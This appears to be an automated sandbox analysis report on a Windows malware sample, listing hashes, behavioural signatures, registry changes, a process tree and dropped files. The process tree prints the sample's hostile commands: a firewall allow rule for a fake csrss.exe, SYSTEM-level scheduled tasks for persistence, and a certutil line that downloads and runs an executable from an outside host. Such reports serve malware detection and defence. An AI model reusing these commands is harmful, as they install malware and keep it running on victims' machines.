Analysis
- Max time kernel: 27s
- Max time network: 158s
- Platform: windows7_x64
- Resource: win7-20220414-en
- Submitted: 24-05-2022 02:52

Static task: static1
Behavioral task: behavioral1
- Sample: f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
- Resource: win7-20220414-en
General
- Target: f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
- Size: 3.8MB
- MD5: e424b0225f4a52439d751fde2bafde40
- SHA1: 7199d44b399f1de33be40a5f5ad615816c9c0846
- SHA256: f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e
- SHA512: 0a4ab1f81f10eb7629e43097cb19f4b9a8ef00a452d4edd77cfd2bbb0d0c9581401d88432cf48494aeb35f8795df2034a56e59e1b9ae6dd889894a3e5eb49a2f
Malware Config
Signatures
- Modifies Windows Firewall (1 TTP)
- Modifies boot configuration data using bcdedit (1 IoC)
  Processes (pid, process):
  - 1140 bcdedit.exe
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Modifies data under HKEY_USERS (17 IoCs)
  Processes (description, ioc, process):
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" (netsh.exe)
  - Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" (netsh.exe)
  - Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" (netsh.exe)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid, process):
  - 1720 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
  - 428 f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, 1720, f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
  - Token: SeImpersonatePrivilege, 1720, f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes (description, pid, process, target process):
  - PID 428 wrote to memory of 1612, 428, f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe, cmd.exe
  - PID 428 wrote to memory of 1612, 428, f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe, cmd.exe
  - PID 428 wrote to memory of 1612, 428, f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe, cmd.exe
  - PID 428 wrote to memory of 1612, 428, f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe, cmd.exe
  - PID 1612 wrote to memory of 776, 1612, cmd.exe, netsh.exe
  - PID 1612 wrote to memory of 776, 1612, cmd.exe, netsh.exe
  - PID 1612 wrote to memory of 776, 1612, cmd.exe, netsh.exe
Processes
Process tree (depth in brackets; each entry lists the image path, then the command line, then the signatures it triggered):

- [1] C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\netsh.exe
        Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        - Modifies data under HKEY_USERS
    - [3] C:\Windows\rss\csrss.exe
      Command line: C:\Windows\rss\csrss.exe ""
      - [4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        - Creates scheduled task(s)
      - [4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        - Creates scheduled task(s)
      - [4] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      - [4] C:\Windows\system32\bcdedit.exe
        Command line: C:\Windows\Sysnative\bcdedit.exe /v
        - Modifies boot configuration data using bcdedit
- [1] C:\Windows\system32\makecab.exe
  Command line: "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524045322.log C:\Windows\Logs\CBS\CbsPersist_20220524045322.cab
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 1021KB
  MD5: 276cdc77b76cc54dabe28221371059e8
  SHA1: 60ef7c80af61f364d20093460e4498074d2b8206
  SHA256: 67543e6156207a069d088c593522dcb8e57ccf5f823052c524ba97aa2f0a98ee
  SHA512: 8d3a2f76358b227958f00b4c2de45235dc17e534badf63513bec5f145c45201c73ce59936ae19498266ce0eb72e521b5f1927d7de01b9e0f11a401b17a88bf89
- C:\Windows\rss\csrss.exe
  Filesize: 1.1MB
  MD5: fdf58d032fef463c7354046ccb60d2c5
  SHA1: 3205f5b482590fe94f6f8e71fb5337f865f7a5f1
  SHA256: 6dac944f7a58fc23568528a66a8ef70fe90ddeb5e117b8f8ccaad87ae7b8e3f2
  SHA512: d097dcda7134511bf962ee274cdc0ebcc1f1431dd4d1ed032e879f7094b10f07c1b1393c7cd4d194cded5ef1d0a31be570e029ecf300a24939b88110e598eaf2
- \Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 1.0MB
  MD5: dc18c26e31bcd1e198896d6adcb911e1
  SHA1: cbc59029137fbd1bbd7dc09277d6fa8aaf22febc
  SHA256: 5e687f9d93f20a7a47938f7ab08d1427f47c412fdc65bfeac3b1458962c98bf9
  SHA512: 572035bec6488c9231cf18664a8db3546b2a666d492232398c2b31e4a49bdd9dc6f0d188734357bc218d355691fd55925599825a467c27c55c431349f70f25cf
- \Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 648KB
  MD5: f9be669affcaa92e22c9a0c561cf801a
  SHA1: d2f9833017e91843253ecd37b7a45ce88cee8795
  SHA256: 21d1efd786411d18826e8d5246e72444b6ba9dcf04459c4a45591f1856ba3a7e
  SHA512: 7ffb2482538aa6d9d4c0ff50ca490c202166602ab0c31d8e6953bba573f029e7c73140fce2f83e65b0be798a481fc1fa9238609ce6a9fbd0688dc167bc8b6142
- \Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 733KB
  MD5: 2fbf020fbc32ce3cd93f6d7bdcb5a29f
  SHA1: 229486255a583406b5ae1691fa5e833dde45d00a
  SHA256: 48354876312c30e393a8867803fc44ac1b41519655211fe4ca02dcf7fb8f615e
  SHA512: a67e63ae2bfcffbb6e1b087936420a8b8e44c5cf3bd3a94c7f61ce0dc7dcb0b7302cad081131ff07f37b5a097bac1e8b75f14655a94748c7b9248de97db41ea7
- \Users\Admin\AppData\Local\Temp\dbghelp.dll
  Filesize: 1018KB
  MD5: 6109aa601a138c0c9c4b95cba368a39b
  SHA1: 0790daaa1e6f64821990904700d5e44ccfe404d2
  SHA256: e9e37d233e74840beff30a6210980349bfcc6ad664aa30d3e2fd45d664c63d9b
  SHA512: 3969fcdb0942fa21d9c35a2a3d3d32cb5b38563677ebefdf64522c8a1f6410b13eb70139c1a0fd2fdb77ec3c11f979dd23fc129d309364e3b16ee24ab6c11e2d
- \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
  Filesize: 1.1MB
  MD5: bae0ea83c6fdaa4eb7040c5432947cc8
  SHA1: b4dd209750374e0ca1f242dd15feef600ad16de0
  SHA256: 19921bba5e87d6242a684af81e8d711af2e91a52c759f6c6900742fa6c970319
  SHA512: cd408293fd53c2ae01a25047e57e673ded53329e92e4a7f9fd94c137d00b68f08e78be3c0c2776c6be46bb7a00c2dbb7f3b86085a23ca314fe87cdb0b1b1b1b3
- \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
  Filesize: 1.0MB
  MD5: 1436b03d344a5c4a7b92970aeb4fa684
  SHA1: c0309499ca487900bd6fb58762438c76fd0ff423
  SHA256: d407a47a117a77026638a5970fda440ca25906727d1d7ad97c35fcac508ef7c5
  SHA512: 7082a267ed04ee1d05ec4f8cda501785549e5986c258627fc0d9494ef64bb3b0e06e19efa552945b1285cfef1e1774fae40ef5d52c514519308a658b19a78eb4
- \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
  Filesize: 1.0MB
  MD5: a2627e145b0e8c09ce9dcf28b98fdae8
  SHA1: 147e75d5e1e31844ef04072ebdc3ef6911bf3fe2
  SHA256: c34d2e99d76b6722ef8058238b3cb59307e5ba989fb81078cb6f59568a420528
  SHA512: 84d265b30bb3b4797b8fa087afcb3d581083e510b07ac2729075a4f90a434ac589ae9fef6108758b4acff54ab6d19699b38a776ba0008231b5fe0c087212b735
- \Users\Admin\AppData\Local\Temp\osloader.exe
  Filesize: 528KB
  MD5: 2ee1fc6fe22665bda8472c00919d7d5b
  SHA1: bf04753227da94d8e17e65ef2aa43f49ef33ce49
  SHA256: de7acac110ccda6fb63480c11c53ced38ff04dc0ddb99eb11bec41ef992ac9e6
  SHA512: a8b686cce66ef915a5c2130003a16f73f5e07d7971d612974fa29bf0cc61a8b2c6054cfe34fba186f1b7b7150bac4388b388322ba9f401c5e78e52608ea77bf5
- \Users\Admin\AppData\Local\Temp\osloader.exe
  Filesize: 508KB
  MD5: c28538794f51c845ab46e1cd7c3440e9
  SHA1: 93b0b555ba4c601c842759d9fb2c554aa60d967b
  SHA256: 3a429c75b58d5c28312d1a8a5bc7d3cee289fc48eb7c212a68f17750aaf5d184
  SHA512: f153a13854e55d5ef81b876c6755dc1c0ef2a03de6ce6ec2ab4eb236bf963f960b33a3993b3f27d8b64192f0924e18f18c201f97b1a2272b3744f0edabc6951c
- \Users\Admin\AppData\Local\Temp\osloader.exe
  Filesize: 454KB
  MD5: 616a78ad95bc201d7f631561882de1fb
  SHA1: e5eb1134a56aa8eb67b1972e0285199548f8d93f
  SHA256: 0530b4398c89bc98480103b72f0a398724ee1b3b014bfdad836990edafddb6ed
  SHA512: 5bacac46ab41bdcade7ee2d07e827604bf53b083773df2b1c66e9bf478a96ad2f5b28e1a51c843ff145b9e59dcfffc29adb41660a1a5394f31f273d3d72278a8
- \Users\Admin\AppData\Local\Temp\symsrv.dll
  Filesize: 163KB
  MD5: 5c399d34d8dc01741269ff1f1aca7554
  SHA1: e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
  SHA256: e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
  SHA512: 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
- \Windows\rss\csrss.exe
  Filesize: 987KB
  MD5: fabcf4212b5323003245df6249164d7d
  SHA1: c6fa7ecae15fcc473b80592e1d3e81d43701a8db
  SHA256: da34626e17fa8eb50b9da678b4e43cc491638c5348890c96020f8971822f96e2
  SHA512: 1ce7f5697ab2224252af77e3d01a971b17b14b231d862128fa5fd3df51ad02c31439bbe32b279755f99761fd91f4215960fda0c381380ac58058437f6138f08d
- \Windows\rss\csrss.exe
  Filesize: 1000KB
  MD5: 02c2b8493a35a8541cb49944e99262e8
  SHA1: 5a381437c6c213c8ad8585977a31cede12cefec0
  SHA256: 6619bef07e940ab2c8e903e6cf004df72a6a5405dff9886c545268705795aaf0
  SHA512: 00e84f385f8eab65c13249700b7b8f015dd44c7f849a6f1008fb803655554445f0ec17cd9c62a01d6bd7ca9921ce6f045d03aad77ac57ffbccef75700cae3c71
- memory/428-67-0x0000000000400000-0x000000000313D000-memory.dmp
  Filesize: 45.2MB
- memory/428-66-0x00000000033C0000-0x0000000003766000-memory.dmp
  Filesize: 3.6MB
- memory/428-58-0x00000000033C0000-0x0000000003766000-memory.dmp
  Filesize: 3.6MB
- memory/776-61-0x000007FEFC041000-0x000007FEFC043000-memory.dmp
  Filesize: 8KB
- memory/776-60-0x0000000000000000-mapping.dmp
- memory/1140-84-0x0000000000000000-mapping.dmp
- memory/1612-59-0x0000000000000000-mapping.dmp
- memory/1720-54-0x00000000033D0000-0x0000000003776000-memory.dmp
  Filesize: 3.6MB
- memory/1720-57-0x0000000000400000-0x000000000313D000-memory.dmp
  Filesize: 45.2MB
- memory/1720-56-0x0000000003780000-0x0000000003E75000-memory.dmp
  Filesize: 7.0MB
- memory/1720-55-0x00000000033D0000-0x0000000003776000-memory.dmp
  Filesize: 3.6MB
- memory/1940-70-0x0000000000400000-0x000000000313D000-memory.dmp
  Filesize: 45.2MB
- memory/1940-69-0x0000000003140000-0x00000000034E6000-memory.dmp
  Filesize: 3.6MB
- memory/1940-68-0x0000000003140000-0x00000000034E6000-memory.dmp
  Filesize: 3.6MB
- memory/1940-64-0x0000000000000000-mapping.dmp